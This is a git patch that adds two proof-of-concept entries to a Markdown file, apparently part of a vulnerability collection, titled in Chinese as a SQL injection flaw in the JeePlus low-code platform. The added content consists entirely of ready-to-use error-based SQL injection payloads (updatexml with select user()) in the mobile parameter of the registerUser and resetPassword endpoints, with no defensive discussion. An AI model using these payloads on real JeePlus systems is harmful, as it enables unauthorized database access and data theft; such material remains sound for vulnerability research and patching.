From ba37696e6e616e307711d169c782708ef837a86b Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 7 Apr 2024 20:21:45 +0800 Subject: [PATCH] =?UTF-8?q?Update=20JeePlus=E4=BD=8E=E4=BB=A3=E7=A0=81?= =?UTF-8?q?=E5=BC=80=E5=8F=91=E5=B9=B3=E5=8F=B0=E5=AD=98=E5=9C=A8SQL?= =?UTF-8?q?=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- JeePlus低代码开发平台存在SQL注入漏洞.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/JeePlus低代码开发平台存在SQL注入漏洞.md b/JeePlus低代码开发平台存在SQL注入漏洞.md index 11c03de..5f21102 100644 --- a/JeePlus低代码开发平台存在SQL注入漏洞.md +++ b/JeePlus低代码开发平台存在SQL注入漏洞.md @@ -24,3 +24,13 @@ Accept: */* Connection: Keep-Alive Cookie: jeeplus.session.id=a24d6e112a864ef795cce1f664a6022a; ``` + +## poc3 +``` +/a/sys/register/registerUser?roleName=wangba&mobile=13300990099'and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%23&randomCode=2131&loginName=test1&password=123123&confirmNewPassword=123123&ck1=on +``` + +## poc4 +``` +/a/sys/user/resetPassword?mobile=13588888888'and (updatexml(1,concat(0x7e,(select user()),0x7e),1))%23 +```